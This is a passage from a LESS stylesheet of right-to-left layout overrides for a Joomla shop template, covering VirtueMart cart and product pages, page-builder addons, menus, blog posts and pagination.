		  -ms-transform: translateX(260px);
		  -o-transform: translateX(260px);
		  transform: translateX(260px);
		  
		  #cart-menu,
		  .cd-cart {
			  //float:left;
			  left:0;
			  right:auto;
			  >i {

				  left:-3px;
				  right:auto;

			  }
			  .total_products {
				right: auto;
				left:0;
				margin-left:-18px;
				position:relative!important;
				
			  }
		  }
  
  
		}
		
		#cd-menu-trigger {

			right: auto;
			left:0;
			
				.cd-menu-icon {
					  display: inline-block;
					  position: absolute;
					  right: 50%;
					  top: 50%;
					  bottom: auto;
					  left: auto;
				}
		}
		.vm-fieldset-customer-note {
			textarea {
				width:100%;
				margin-bottom:10px;
			}
		}
	
		form.vm-form-login{
			display:table;
			width:100%;
			.forgot{
				display:block;
				
				.floatleft {
					float:right;
					margin:5px 0;
					
					&#com-form-login-remember {
					
						label {
							padding-right:10px;
						}
						input.inputbox {
						  margin:0;
						}
						input.default {
							display:inline-block;
							text-align:center;
							padding-left:22px;
							min-width:120px;
							padding-right:22px;

						}
					}
				}
			}
		}
		
		
	.billto-shipto{
		a.details{
			float:right;
			margin:7px auto;
			border: 0;
			border-radius:4px;
		}
		
		.output-shipto{
			input{
				margin-left: 0;
				margin-right: 10px;
			}
			.controls{
				label{
					padding-left: 0;
					padding-right: 20px;
				}
				input{
					margin-left: 0;
					margin-right: -20px;
				}
			}
		}
	}
	
    input.quantity-input{
	  border-radius:0 4px 4px 0!important;
    }
    .vm2-remove_from_cart{
		height:16px;
    	border-radius: 4px 0 0 4px!important;
		i {
			line-height:16px!important;
		}
    }
	
	
	/* Terms of service */
	.vm-fieldset-tos {
	
		.cart.tos {
			margin-left:4px;
			margin-right:0;
			float:right;
			
			input.check {
				float:right;
				 margin:7px 3px 0 10px;
			}
		}
		
		div.terms-of-service {	
		float:right;
			label {
				margin-left:0;
				margin-right:15px;
				
		
				a#terms-of-service {
					i {
						margin:0 3px;
					}
				}
			}	
		}

	}
	
	.checkout-button-top {
		float:right;
	}
	
	// Checkout inputs
	table.user-details{
		width:100%;
		tr{
			td{
		
			
			
				label {
					text-align:left;
					padding-left:15px;
					padding-right:0;
					width:100%;
				}
				label, input, select {
					
				}
				input{  
					text-align:right;
				}			
			}
		}
	}

		.total_products {
			/* number of items added to the cart */
			position: absolute;
			top: 23px;
			left: 312px;
			right:auto;
		}


		//mega menu
		.sp-megamenu-parent {
			float: left;
			>li {
				>a {
					>i {
						display:inline-block;
						line-height:inherit;
						padding-right:0;
						padding-top:2px;
						padding-left:9px;
						float:right;
					}
				}
			}
		}

		.sp-megamenu-parent >li.sp-has-child>a:after {
			display: none;
		}

		.sp-megamenu-parent >li.sp-has-child>a:before {
			font-family: "peIcon7";
            font-size:15px;
			content: "\e688";
			margin-right: 5px;
            float:left;
            margin-top:2px;
		}
		
		.sp-megamenu-parent >li.sp-has-child>a:hover:before {
			font-family: "peIcon7";
			content: "\e680";
			opacity:.7;
		}
		//List Item
		li.sp-menu-item { //child sub	
		text-align:right;	
			>a {
				&.sp-group-title {
					margin-right:0;
				}
				>i {
					padding-right:0px;
					padding-left:5px;
				}
				> img {
					margin-left:7px!important;
					margin-right:0!important;
				}
			}
		}
		
		.sp-dropdown {
				
				&.sp-menu-center {
					margin-left: 0;
					margin-right: 45px;
				}
				
				&.sp-dropdown-main {
					&.sp-menu-right,
					&.sp-menu-full {
						left: auto;
						right:0;
					}
		
					&.sp-menu-left {
						right: auto;
						left:0;
					}
				}
		}
	
		.sp-dropdown-items {
			.sp-has-child {
				>a:before{
					font-family: "peIcon7";
					content: "\e686";
					float: left;
				}
				>a:hover:before{
					font-family: "peIcon7";
					content: "\e688";
				}
				>a:after{
					display:none;
				}
			}
	
		}
		
		// Timeline
		.sppb-addon-timeline {
			.sppb-addon-timeline-wrapper {
				.odd {
					.timeline-badge {	
						&:after{
							left:0;
							right:auto;
							float:left;
						}
					}
		
					.timeline-item {
						.timeline-panel {
							margin-left: 0;
							margin-right:15px;
							left:0;
							right:auto;
							float:right;
							text-align:right;
							
							&:before {
								top: 40px;	
								left:auto;
								right:0; 
								-webkit-transform:rotate(45deg) translateY(-50%);
								transform:rotate(45deg) translateY(-50%)
							}			
						}
						.timeline-date {
							float:left;
							text-align:left;
							margin:-1px 0 0 30px;
						}
					}
				}
				.even {	
				
					.timeline-badge {	
						&:after{
							left:auto;
							right:0;
							float:right;
						}
					}
					
					.timeline-item {
						.timeline-panel {
							margin-left: 15px;
							margin-right:0;
							
							left:auto;
							right:0;
							float:left;
							text-align:left;
							
							&:before {
								top: 30px;	
								left:0;
								right:auto; 
								margin-left:-5px;
								-webkit-transform:rotate(-135deg);
								transform:rotate(-135deg);
							}	
						}
						.timeline-date {
							float:right;
							text-align:right;
							margin:-1px 30px 0 0;
						}
					}
				}
			}
		}
	
		
		// Buttons
		.btn,
		.sppb-btn {
			margin-left:3px;
			margin-right:0;
		
			&.sppb-selector,
			&.sppb-modal-selector {
				i {
					&.fa, &.fas, &.far {
						margin:0 0 0 4px;
					}
					&.pe {
						margin:-2px -2px 0 5px;
					}
				}
			}
			
			&.btn-light {
				i {
					margin-left:6px;
					margin-right:0;
					&.pe {
						margin-left:7px;
						margin-right:0;
					}
				}
			}
			&.responsive {
				white-space: normal;
				text-align:center;
				display:table;
			}
		}

	// Progress bar ("flex")
	.flex-text-wrapper {
		margin:15px 0 3px;
		.flex-text {
			margin: 20px 0 0;
			display:table-cell;
			width:1%;
		}
		.flex-progress-text {
			margin: 20px 0 0;
			width:1%;		
			display:table-cell;
			text-align:left;
		}
	}
	
	// Testimonial Flex
	.sppb-testimonial-flex {
		.left, .right {
			>i {
				&.fa-angle-left{
					padding:0 3px 2px 0;
					-webkit-transform: rotate(180deg);
					-moz-transform: rotate(180deg);
					-ms-transform: rotate(180deg);
					-o-transform: rotate(180deg);
					transform: rotate(180deg);
				}
				&.fa-angle-right{
					padding:0 0 2px 3px;
					-webkit-transform: rotate(180deg);
					-moz-transform: rotate(180deg);
					-ms-transform: rotate(180deg);
					-o-transform: rotate(180deg);
					transform: rotate(180deg);
				}
			}
		}
	}
	.sppb-media-body {
			>i.fa, >i.fas, >i.far {
	
				&.fa-quote-left {
					margin:-2px 0 2px 10px!important;
				}
				&.fa-quote-right {
					margin:1px 10px 0 0!important;
				}
			}
	}
	
	// Tabs (pills style)
	.sppb-nav-pills,
	.sppb-nav-tabs {
		>li {

			>a {

				i {
					margin-left:5px;
					margin-right:0;
				}
			}
			
		}
	}
	.sppb-tab {
		.sppb-tab-content {
			text-align:right;
		}
	}

	// Latest blog posts (addon)
	.latest-post {
		.latest-post-inner {
		
			.category{
				
				.posted-in {
					float:right;
					margin:1px 0 0 5px;
					text-align:right;
				}
			}
		}
		
	}
	
	// Button Group
	.sppb-addon-button-group {
		.sppb-btn {
			>i.fa, >i.fas, >i.far {
				margin-left:4px;
				margin-right:-2px;
			}
			>i.pe {
				margin:-2px -3px 0 4px;
			}
		}
	}
	
	//Bootstrap Modal Popup
	.sppb-modal-content {
		.sppb-close {
			left:12px;
			padding-right:12px;
			text-align:left;
			right:auto;
		}
		
	}

	//Modal Popup
	.sppb-btn {
		&.sppb-btn-lg {
			&.sppb-selector {
				
				>i.fa, >i.fas, >i.far {
					margin-left:5px;
					margin-right:0;
				}
				>i.pe {
					margin-left:5px;
					margin-right:0;
					margin-top:-3px;
		
				}
			}

		}
	}
	
	//Person (Flex style)
	.flex.flip-container {
		.flipper {
		
			.back{
			text-align:right;
				.sppb-person-block {
				
					>.thumb {
						float:right;
							>img {
								margin:0;
							}
					}
					.sppb-person-information {
						text-align:right;
						padding-right:10px;
					}
				
				}
				.sppb-person-introtext {
					text-align:right;
				}
			}
		}
		
	}
	
	// Pricing Table 
	.sppb-pricing-box {
		.sppb-pricing-footer {
			>a.sppb-btn {
		
				>i {
					margin-left:5px;
					margin-right:0;
					&.pe {
						margin:-3px 0 0 5px;
					}
				}
			}
		}
	}
	
	//Image content addon
	.sppb-addon-image-content {

	&.aligment-left {
		
		.col-sm-6 {
			left:50%;
		}
	
		.sppb-content-holder {	

			.sppb-btn {

				>i.left {
					margin-right:-2px;
					margin-left:8px;
				}
			}
		}
		
	}

	&.aligment-right {
		.col-sm-6 {
			left:-50%;
		}
		.sppb-content-holder {
			
			left:0;
			right: auto;

			.sppb-btn {
			
				>i.right {
					margin-left:8px;
					margin-right:-2px;
				}
			}
		}
	}
	
	.sppb-addon-title,.sp-module-title {
		padding-left:30px;
		padding-right:0;
		text-align:right;

		&:after{
			float:right;
			margin:10px 0 0 30%;
		}
	}	

}

	// Accordion
	.sppb-panel-flex,
	.sppb-panel-default,
	.sppb-panel-primary {	
		>.sppb-panel-heading,
		>.sppb-panel-heading.active {
			&:before {
				float:left;
			}
			&:after {
				float:left;
			}
			.sppb-panel-title {
				>i.fa, >i.fas, >i.far {
					margin-left:10px;
					margin-right:0;
				}
						
				>i.pe {
					margin-left:7px;
					float:right;
					margin-right:0;
				}
			}
		}
	}
	
	
	// Animated Headlines Addon
	.cd-headline {
	
		.before-text {
			margin-left:.1em;
			margin-right:0;
		}
		
		.after-text {
			margin-left:0;
			margin-right:.1em;
		}
		.cd-words-wrapper {

			//text-align: right;
			
		
			b {
				left: auto;
				right:0;
				
				&:before {
					padding:0 0.15em 0 0;
				}
				&:after {
					padding:0 0 0 0.15em;
				}
			}
		}
		
		/* Type Effect */
		&.type {
			
			.after-text {
				margin-left:0;
				margin-right:.15em;
			}
			.cd-words-wrapper {
				margin-left:.1em;
				margin-right:.1em;
				padding:0;
				
				i {
					text-indent:4px;
				}
				
				&::after {
					left:0;
					right:auto;
					width:2px;
					border:0;
					border-left: 2px solid @major_color;
				}
			}
		}
		
		/* Loading Bar Effect */
		&.loading-bar {
		
			.cd-words-wrapper {
				
				&::after {
					left: auto;
					right: 0.02em;
				}
			}

			b {
				.translate(115%; 0);
			}
			b.is-visible {
				.translate(0; 0);
			}
		}
		
		/* Clip Effect */
		&.clip {
			
			.cd-words-wrapper {
				
				&::after {
					left: 0;
					right:auto;
				}
			}
			b {
				padding:0 0 0 3px;

			}
		}
		
	}
	

		//module
		
		.sp-module,
		.sppb-addon-module {
			margin-top: 50px;
				
			&:first-child {
				margin-top: 0;
			}

			.sppb-addon-title,.sp-module-title {
				padding-left:30px;
				padding-right:0;
				text-align:right;
		
				&:after{
					float:right;
					margin:10px 0 0 30%;
				}
			}
			
			// Accordion menu
			.accordion-menu {
				> li{
					.offcanvas-menu-toggler {
						left: 0;
						right:auto;
						padding:11px 25px 11px 20px;
					}
					
					.accordion-menu-toggler {
						left:0;
						right: auto;
						
						.open-icon {
							&:before {
								left: 0;
								right:auto;
								width:44px;
							}	
						}
					}			
				}
			}
		}
		
		.sppb-addon {
		
			>h3.sppb-addon-title {
				text-align:right;
				display:inline-block;
				padding-left:3%;
				padding-right:0;
				
				&:after{
					float:right;
					margin:10px 0 0 30%;
				}
			}
		}
		
		
		.sp-module ul >li >a:before {
			margin-right: 0;
			margin-left: 8px;
			float: right;
		}

	//blog
		
	.entry-header {

		&.has-post-format {
			margin-right: 62px;
			margin-left:0;
			
				h2 {
					margin: 0;
					line-height: 1.2;
					width:auto;
					padding-left:30px;
					padding-right:0;
			
					&:after{
						float:right;
						margin:10px 0 0 30%;
					}
				}
		}
		h2 {
			padding-left:30px;
			padding-right:0px;
			box-shadow: inset 0 -1px 0 #ddd;
	
			&:after{
				float:right;
				margin:10px 0 0 30%;
			}
		}
	}
	
	.has-post-format-masonry {

		.post-format-masonry {
	
			right: 8px;
			left:auto;

		}
		
	}


	.sppb-progress-bar {
		float:right;
		text-align:right;
	}
	
	// Countdown addon
	.sppb-addon-countdown {
		div {
			float:right;
		} 
	}
	

		
		
		.entry-header.has-post-format {
			margin-left: 0;
			margin-right: 68px;
		}
		.post-format {
			left: auto;
			right: -68px;
		}
		.article-info >dt >i, .article-info >dd >i {
			margin-right: 0;
			margin-left: 3px;
		}
		.entry-link:before {
			top:auto;
			left: auto;
			right: -60px;
			transform: rotate(-90deg);
		}
		.entry-quote:before {
			left: auto;
			transform: rotate(-15deg);
			top:auto;
			right: -40px;
		}
		.categories-list .page-header a.pull-right {
			float: left !important;
		}
		.newsfeed-category .category li .pull-left{
			float: right !important;
		}

		// voting
		.voting-symbol{
			direction: ltr;
			span.star {
				&:before{
					padding-left: 5px;
					padding-right: 0;
				}
		
			}
		}
		
		//search
		.search {
	
			button[name="Search"] {
				position:absolute;
				left:-19px;
				right:auto;
				float:left;
				border-radius:4px 0 0 4px;
				.transition(color 300ms);
			}
	
		/* icon fa-search */
		&.flex-search {
			&:before {
				position:absolute;
				margin-left:25px;
				float:none;
				left:0;
				right:auto;
				padding-left:5px;
				.transition(color 300ms)!important;
			}
			&:hover:before,
			&:focus:before,
			&:active:before {
				margin-left:25px!important;
			}
		}
		
		}
		.search.flex-search:hover:before {
			margin-right:0;
			float:left;
			right:auto;
			margin-left:0px;
			left:0;
		}
		.search .btn-toolbar .pull-left{
			float: right !important;
		}
		
		/* AcyMailing Module */
		.acymailing_form {

			.acysubbuttons{
		
				top:-20px;
				right:auto;
				left:-3px;
				float:left;
				
				input {
					border-radius:4px 0 0 4px;
					border:none;
				}
			}
		}
		
		
	/* Virtuemart */
	.vm-product-details-inner{
		.vm-product-title{
			.pull-left {
			    width:100%;
				display:block;
				clear:both;
				
			}
			
			h2{
				width:100%;
				margin:0;
			}

		}
	
		.vm-product-shipments, .vm-nodisplay {
			display: none;
		}
		.product-price{
			text-align: right;
			
			.vm-price-desc {
				text-align: right;
				float:right;
				padding:3px 0 0 8px;
			}
		}
		
		.product-short-description{
			clear: both;
			margin-bottom: 30px;
			overflow: hidden;
			h4{
				>i {
					font-size:90%;
					margin:5px 0 0 5px;
				}
			}
		}
		.spacer-buy-area{
			padding: 0;
			display:block;
			width:100%;
			clear:both;
			
				
			.addtocart-bar{
				padding:0;
				margin:0;

				.cd-customization {
					.add-to-cart {
						display:block;
						float:right;
						right:0;
					}
				}
				
				.calculate {
					
					float:right;
					margin:4px 0 0 0;
					
					.quantity-box {
						float:none;
						
						input {
							width:32px;
							height:32px;
							display:inline;
							text-align:center;
						}
					}
					.quantity-controls{
					    top:16px;
						right:-18px;
						
						input.quantity-plus,
						input.quantity-minus {
							display:block;
							position:relative;
							float:left;	
							z-index:2;	
							background-image:none;
							background:transparent;
							box-shadow:none;
							border:none;		
						}
						input.quantity-plus{
							width:22px;
							height:16px;
							margin:-16px 0 0 0;	
							background-image:none;
						}
						input.quantity-minus{
							width:20px;
							height:16px;
							margin:0 0 0 0;
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							float:left;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:1px 10px 0 0;
							}
							&.fa-chevron-down {
								margin:18px 10px 0 0;
							}
						}					
					}
				}
			}
		}
	}
	
	.empty_cart i span.fa-ban{
		margin-right:20px;
	}
	
	/* Images on Product page */
	.productdetails-view {
		.vm-product-media-img{
			.additional-images{
				div.cols {
					float:right;
					&.cols-1,
					&.cols-2 {
						width:47%;
						margin:0 1.5% 4.5%;
					}
					&.cols-3 {
						width:30%;
						margin:0 1.6% 3.3%;
					}
					&.cols-4 {
						width:22.5%;
						margin:0 1% 3%;
					}
				}
			}
		}
	}



	#fancybox-content{
		.continue_link {
			margin:0 2.5% 0 0!important;
			width:45%!important;
			float:right!important;
			left:auto;
			right:0;
		}
		.showcart {
			margin:0 0 0 2.5%!important;
			width:45%!important;
			float:left!important;
			left:0;
			&:before {
				margin: 0 0 0 10px!important;
			}
		}
	}
			
	
	// products icons (pdf,print,email)
	.icons {
		float:left;
		right:auto;
		left:1%;
		margin: 15px 0 0 15px;

		a {
			float:right;
			display:inline-table;
		}
	}
	
		.vm-rating{
			width:100%;
			display:block;
			clear:both;
			margin-bottom:25px;
			
			.product-in-stock {
				float:right;
				text-align:right;
				margin-left:5px;
				margin-right:0;
				color:#777;
				font-size:95%;
				>i {
					margin-left:5px;
					margin-right:0;
					&.pe-7s-less {
						color:red;
					}
				}
			}
			
	
		}
	
	.addtocart-bar {
		width:100%;
		height:44px;
		display:block;
		clear:both;
	}
	
	div.ask-a-question{
			float:right;

			a.ask-a-question{
				
			    i{
			    	margin-left:7px;
					margin-right:0;
			    }
				
			}
		}
		.back-to-category{
			float:right;
			a{
			    i{
			    	margin-left:7px;
					margin-right:0;
					
			    }
			}
			
		}

	// products information tab
	.products-desc-tab{
	
		.nav-tabs{
			
			>li {
				float:right;
				>a{
					margin:0 0 0 7px;
					
					>i{
						margin:-1px 0 0 10px;
					}
				}
			}
		}

		.tab-content{
		
			.tab-pane {
			
				.rating_wrap {
					margin:20px auto;
					padding:12px 10px 8px;

				}
				.rating {
					.ratingbox{
					    display:block;
						span {
							float: left;

						}	
					}	
				}
			}
		
			.product-description{
				ul{
					padding: 0;
					>li{
						list-style: none;
					}
				}
			}
			.customer-reviews{
		
				h4{
					padding: 0 0 15px 5%;
					margin:0;
				}
				.list-reviews{
					margin:20px auto;
					span.date{
						margin: 6px 0 0 5px;
						
						>i {
							margin-left:8px;
						}
					}
					span.vote{
				   
						.ratingbox{
							
						}
					}
					blockquote{

						margin-left:110px;
						
						&:before{
						
						  padding-left: 6px;
						  padding-right:0;

						}
						
						&:after{
						  padding-left: 6px;
						  padding-right: 0;
						}
					}
					.bold {
						padding-left: 6px;
						padding-right:0;
					}
				}
				.write-reviews {
					
					text-align:right;
					margin:20px 0;
					.step {
					   
					}
				}
			}
		}
	}

	.currency-selector-module {
		select {
			max-width:71%;
			float:right;
			margin-left:5px;
		}
		button.btn,
		input.btn {
			width:22%;
			//float:left;
		}
	}
	
	.cart-view{
		.jumbotron{
			.btn {
				i {
					margin:0 -5px 0 10px;
					float:right;
				}
			}
		}
	}
	
// Ordering
.orderby-displaynumber{
  
  margin:0 auto 20px;
  display:block;
  clear:both;
  width:100%;

	.vm-order-list {
		float:right;
		right:0;
		left:auto;
		.orderlistcontainer{
			float:right;
			margin:0 0 0 8px;
			
			
			.title {
				display:inline-block;
				padding:5px 15px 5px 8px;
				font-size:14px;
				-webkit-transition: all .5s ease-in-out;
				transition: all .5s ease-in-out;
				
				&:before {
					padding:0 8px 0 0;
				}
			}
			.activeOrder {
				background-image:none;
				display:inline-block;
				border:none;
				padding:0 0 0 15px;
				font-size:14px;
				
			}
			.orderlist {
					-webkit-transition: all .25s ease-in-out;
					  transition: all .25s ease-in-out;
					  border:0;
					  border-radius:0 0 4px 4px;
					  box-shadow:0 0 0 1px #ddd;
					  cursor: pointer;
					  visibility:hidden;
					  opacity:0;
					  display:block;
					  position:absolute;
					  z-index:2;
					  margin-top:-10px;
					 
					  div {
						padding:0;
						 margin:0;
						  width:170px;
						  
						 -webkit-transition: all .25s ease-in-out;
						  transition: all .25s ease-in-out;
						  a {
							 padding:5px 15px;
							 display:block;
						  }
						  &:hover {
							  background:#f0f0f0;
						  }
					  }
		
			}
			
			&:hover {
					.orderlist {
						opacity:1;
						display:block;

						visibility:visible;
						margin-top:1px;
					}
			}
				
			
		}
	}
	.display-number {
		margin:0;
		padding:5px;
		text-align:right;
		font-size:14px;
		float:left;

		>span:first-child {
			margin:0 10px 0 0;
			text-align:right;
			line-height:2;
			display: inline;
			clear:left;
			float:right;
			
		}
		select {
			max-width:60px;
			text-align:right;
		}
		.chzn-container-single,
		.chzn-single {				
			max-width:60px;
			text-align:right;
			display:block;
			margin:-3px 0 0;

		}
			.chzn-single {
				span {
					margin-left: 0;
					margin-right: 8px;
					text-align:right;
				}
				div { 
					left: 8px; 
					right: auto; 
					
				}
			}
	}

}	
	
#fancybox-close {
	left:-15px;
	right:auto;
}

.sppb-text-center {
	text-align:center!important;
}
.sppb-addon {
	&.sppb-text-left {
		text-align:left;
		h3.sppb-addon-title {
			direction:ltr;
			padding-left:0;
			padding-right:3%;
			text-align:left;
			
			&:after{
				clear: both;
				display:block;
				float:left;
				content:" ";
				position:relative;
				height:2px;
				width:70%;
				margin:10px 30% 0 0;
				border-radius:2px;
				padding: 0;
			}
		
		}
		h1,h2,h3,h4,h4,h6 {
			text-align:left;
		}
	}
	&.sppb-text-center {
		text-align:center!important;
		h3.sppb-addon-title {
			width:auto;
			direction:rtl;
			padding-right:0;
			padding-left:3%;
			text-align:center;
			
			&:after{
				clear: both;
				display:block;
				float:right;
				content:" ";
				height:2px;
				width:70%;
				margin:10px 0 0 30%;
				padding:0;
			}
			
		}
		h1,h2,h3,h4,h4,h6 {
			text-align:center;
		}
	}
	&.sppb-text-right {
		text-align:right;
		h3.sppb-addon-title {
			 text-align:right;
			 direction:rtl;
			 
			&:before{
				clear: both;
				display:block;
				float:left;
				content:"*";
				visibility:hidden;
				opacity:0;
				width:100%;
				margin:10px 0 0 0;
			}	
			&:after{
				float:right;
				width:70%;
				margin:10px 0 0 30%;
			}
			
		}
		h1,h2,h3,h4,h4,h6 {
			text-align:right;
		}
	}
}
.category-view,
.browse-view,
.latest-view,
.recent-view,
.featured-view,
.topten-view {
	h4 {
		float:right;
		line-height:1.5;
		display:table;
		margin:35px 0 30px;
		font-size:160%;
		padding-left:5%;
		padding-right:0;
		box-shadow:inset 0 -1px 0 rgba(90,90,90,0.15);
		.divider {
	
			clear:both;
			float:right;
			height:10px;
			width:75%;
		}
	}
	
}
.category-view,
.browse-view,
.latest-view,
.recent-view,
.featured-view,
.topten-view {
	.row {
		
		&.productwrap {
	
			.product, .products {
				border:none;
				margin:0 0 20px -1px;
			}

		}
		
		
		.spacer {
			.spacer-inner {
				text-align: center;
				padding: 20px;
				
				.product_s_desc {
					margin:0 auto;
					hr {
						margin:20px auto;
						width:100%;
						clear:both;	
					}
				}
		
			 .product-price {
					margin: 10px auto;
					padding:0;
					text-align: center;
					display:block;
					height:35px;
					line-height:35px;
					width:100%;
					
			 }
				.product-price *, .product-price .vm-price-desc{
					display: none;
					float:right;
				}
				.product-price .PricesalesPrice{
					font-size: 26px;
					display:block;
				}
			}
		
			.addtocart-bar{
				padding:0;
				margin:25px auto 0;
				width:100%;
				display:block;
				
				.cd-customization {
					width:66%;
					width:calc(71% - 10px);
					float:left;
					
					button{
						width:100%;
					}	
				}
				.calculate {
					width:29%;
					display:inline-table;
					float:left;
					margin:4px 10px 0 0;
					
					
					
					>label.quantity_box {
						display:none;
						text-indent:-9999em;
					}
					span.quantity-box{
					/*display: none;*/

						input{
							padding:0;
							border-radius:3px;
							border:0;
							box-shadow: none;
							background:rgba(0,0,0,0.05);
						}
					}
					.quantity-controls{
						/*display: none;*/
						background-image:none;
						margin:0;
						
						input.quantity-plus,
						input.quantity-minus {
							width:20px;
							height:16px;
							display:block;
							position:absolute;	
							z-index:2;
							
						}
						input.quantity-plus{
							margin:-16px 0 0 0;
						
							&:hover {
								& + .fa {
									color:#999;	
								}
								& + .fas, & + .far {
									color:#999;	
								}
							}
							
						}
						input.quantity-minus{
							margin:0;

							&:hover {
								& + .fa {
									color:#999;
									
								}
								& + .fas, & + .far {
									color:#999;	
								}
							}
							
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:-13px 0 0 -3px;
							}
							&.fa-chevron-down {
								margin:0 0 0 -3px;
							}
						}
						
					}
			
				}
	
			}
			
			&:hover {
				img {
					transform:scale(1.1);
				}
			}
		
			.addtocart-bar{
				padding:0;
				margin:25px auto 0;
				width:100%;
				display:block;
				
				
				.cd-customization {
					width:65%;
					width:calc(70% - 10px);
					float:right;
				}
				.calculate {
					width:33%;
					display:inline-block;
					float:right;
					margin:4px 0 0 8px;

					
					.quantity-box {
						float:right;

						input {
							width:32px;
							height:32px;
							display:inline;
							text-align:center;
							border-radius:3px!important;
						}
					}
					
					
					.quantity-controls{
					    top:16px;
						right:-1px;
						float:right;
						display:inline-block;
						width:24px;
						
						input.quantity-plus,
						input.quantity-minus {
							display:block;
							position:relative;
							float:left;	
							z-index:2;	
							background-image:none;
							background:transparent;
							box-shadow:none;
							border:none;		
						}
						input.quantity-plus{
							width:20px;
							height:16px;
							margin:-16px 0 0 0;	
						}
						input.quantity-minus{
							width:20px;
							height:16px;
							margin:0 0 0 0;
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							float:right;
							
							&.fa-chevron-up {
								margin:1px -4px 0 0;
							}
							&.fa-chevron-down {
								margin:18px 6px 0 0;
							}
						}					
					}
				}
	
			}
			
			.spacer-inner {
				padding: 20px 20px 1px;
			}
		}
		.ratingbox{
			background-size: 13px;
			max-width: 65px!important;
		}
	
		.vm-details-button{
			display: none;
		}
		
		
	}
}
		.spacer {
			.spacer-img {
				span.overlay {
					width:calc(100.03% - 7px)!important;
					text-align:center;
					height:auto;
					bottom:0;
					box-shadow:inset -1px 0 0px fade(grey, 10%)!important;
					padding:20px 20px 19px;
					margin:0 14px 1px 0;
					>h3 {
						color:#555;
						padding:0;
						margin:0 auto;
					}
				}
			}
		}
	
	//shop-product vm-module
	.vmgroup {
			.addtocart-area {
				display:block;
				clear:both;
				width:100%;
				margin:0 0 0;
				
			  .addtocart-bar{
				padding:0;
				
					.cd-customization {
						.add-to-cart {
							display:block;
							
						}
					}
				
				.calculate {
			
					width:50px;
					float:right;
					margin:4px 0 0 5px;
					
					.quantity-box {
						
						input {
							width:28px;
							height:28px;
							display:inline;
							text-align:center;
						}
					}
					.quantity-controls{
					    top:12px;
						right:0px;
						
						input.quantity-plus,
						input.quantity-minus {
							display:inline;
							position:relative;
							float:left;	
							z-index:2;	
							background-image:none;
							background:transparent;
							box-shadow:none;
							border:none;		
						}
						input.quantity-plus{
							width:20px;
							height:16px;
							margin:-16px 0 0 0;	
							background-image:none;
						}
						input.quantity-minus{
							width:20px;
							height:16px;
							margin:0 0 0 0;
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							float:left;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:1px 4px 0 0;
							}
							&.fa-chevron-down {
								margin:16px 4px 0 0;
							}
						}					
					}
				}
	
			}
		}
			
		.default-style {
			
			.addtocart-area {
				
				
			
				.addtocart-bar {
					width:160px;
					margin:0 auto;
					display:block;
					text-align:center;
					font-size:105%;
					
					button.add-to-cart {
						
						height:52px;
						width:104px;
						display:block;
						
						>input {
							line-height:32px;
							width:100%;
						}
					}
				}
			}
		}
		
	}
	
	// Custom radios for Custom fields (from Flex 3.9)
	.product-field-display {
		
		label {
			margin:0 0 10px 10px;
		
			span.checker {
				float:left;	
			}
			input.form-radio:hover + span.checker {
				 border:1px solid #999;
				
			}
			input.form-radio:checked + span.checker {
				 padding-left:0;
				 padding-right:22px;
			}
			
			input.form-radio:checked + span.checker::before {
				 position: relative;
				 display:inline-block;
				 left: auto;
				 right: -8px;
			}
		} 
		.vm-cmv-label {
			margin:2px 0 10px 12px;
		}
	}
	
	
	// Popup Cart (Add to Cart Fancybox)
	.popup-cart{
		.item-wrap{
			
			> div {
				
				.item-name, .popup-cart-product-quantity {
					float:right;
					text-align:right;
					clear:both;
					padding:0;
				}
				.vm-price-box{
					float:right;
					padding:0;
					clear: both;
					text-align:right;
					
					ins{
						float: right;
						margin: 0;
					}
					del{
						float: right;
				
					}
				}
				
			}
			
		}
		
	}


		
		/* Navigation left/right */
		.product-neighbours{

			a.previous-page{
				float: right;
				&:before{
					content: "\f105"!important;
					border-radius: 0 4px 4px 0!important;
				}
			}
			a.next-page{
				float: left;
				&:after{
					content: "\f104"!important;
					border-radius: 4px 0 0 4px!important;
				}
			}
			
			.empty-previous-page{
				border-radius: 0 4px 4px 0!important;
				float:right;
			}
			.empty-next-page{
				border-radius: 4px 0 0 4px!important;	
				float:left;
			}
		}
		
		/* Pagination */
		.cd-pagination {
		  li {
			float:right;
			border-right: none;
			border-left: 1px solid #e6e6e6;
			  &:first-of-type {
					a {
					  border-radius: 0 0.25em 0.25em 0;
					}
				}
					
			  &:last-of-type {
				  border-left: none;
					a {
					  border-radius: 0.25em 0 0 0.25em;
					}
				}
		
			}
				.btn-previous {
					a {
						&:before {
							content: "\e607";
							font-family: 'ap-arrows';
						}
					}
				}
				.btn-next {
					&:last-of-type {		
						a {
							&:after {
								content: "\e606";
								font-family: 'ap-arrows';
							}
							
						}
					}
				}
		}
		
		/* Typography */
		ul.site-list {
			li {
				i {
				  margin-right:0;
				  margin-left: 10px;
				}
			}
		}
		.bullets {
			.li-circle {
			  list-style: disc;
			  padding-right:20px;
			  padding-left:0;
			}
		}
		.dropcaps {
			.naked-drop {
				span {
					padding: 0 0 0 20px;
					float: right;
				}
			}
			.full-drop {
				span {
					float: right;
					margin: 5px 0 5px 15px;
				}
			}
		}


	// Call to Action addon
	.sppb-addon-cta {
		
		.sppb-btn {
			float:left;
			left:0;
			right:auto;
		}
		.text-center {
			.sppb-btn {
				float:none;
				left:auto;
				right:auto;
			}
			
		}
	}
	

	// Ajax Contact Form
	.sppb-ajaxt-contact-form {
		.sppb-form-group {
		
			.sppb-form-control[placeholder] {
	
					&::-webkit-input-placeholder{	
						&:before {
						  width:44px;
						  float:right;
						  margin-left:-3px;
						  margin-right:-10px;
						}
					}
		
				
			}
		}
	}
		
		// SP Simple Portfolio
	
	    .sp-simpleportfolio {
			.sp-simpleportfolio-details {
				.sp-simpleportfolio-description {
					float:right;
				}
				.sp-simpleportfolio-meta {
					float:left;
				}
			}	
		}

		.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li,
		.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li .simple-divider {
		  float:right;
		  direction:rtl;
		}
		.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin > a  {
		  border-radius:0;
		  padding: 5px 20px; 
		}
